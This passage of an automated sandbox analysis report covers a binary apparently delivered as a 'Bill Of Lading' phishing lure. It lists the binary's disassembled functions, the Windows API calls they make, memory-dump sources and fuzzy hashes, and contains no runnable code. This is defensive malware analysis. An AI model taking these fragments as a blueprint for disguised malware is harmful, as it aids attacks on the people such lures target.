                                                                                                                      • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                      • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                      • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                      Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2037614760-0
                                                                                                                      • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                      • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                      • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                      • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                      Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                      • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4189319755-0
                                                                                                                      • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                      • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                      • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                      • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                                      Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1726766782-0
                                                                                                                      • Opcode ID: d1f4c8b32701f3515452156a35d83f93081eba70680028f938022ee8972e20b1
                                                                                                                      • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                      • Opcode Fuzzy Hash: d1f4c8b32701f3515452156a35d83f93081eba70680028f938022ee8972e20b1
                                                                                                                      • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                                      Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                      • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                      • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                                      • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                      • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                                      Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                      • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1976402638-0
                                                                                                                      • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                      • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                      • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                      • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                      Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                        • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                      • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                      • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                        • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                      • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4137160315-0
                                                                                                                      • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                      • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                      • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                      • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                      Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                      • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                      • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                      • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Show$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1871949834-0
                                                                                                                      • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                      • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                                      • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                      • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                                      Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0044961A
                                                                                                                      • SendMessageW.USER32 ref: 0044964A
                                                                                                                        • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                                      • _wcslen.LIBCMT ref: 004496BA
                                                                                                                      • _wcslen.LIBCMT ref: 004496C7
                                                                                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1624073603-0
                                                                                                                      • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                      • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                                                      • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                      • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                                                      Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                      • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                                      • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                      • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                                      Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1640429340-0
                                                                                                                      • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                      • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                      • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                      • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                      Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354276064-0
                                                                                                                      • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                      • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                                                      • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                      • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                                                      Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 752480666-0
                                                                                                                      • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                      • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                      • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                      • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                      Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3275902921-0
                                                                                                                      • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                      • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                      • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                      • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                      Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                      • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
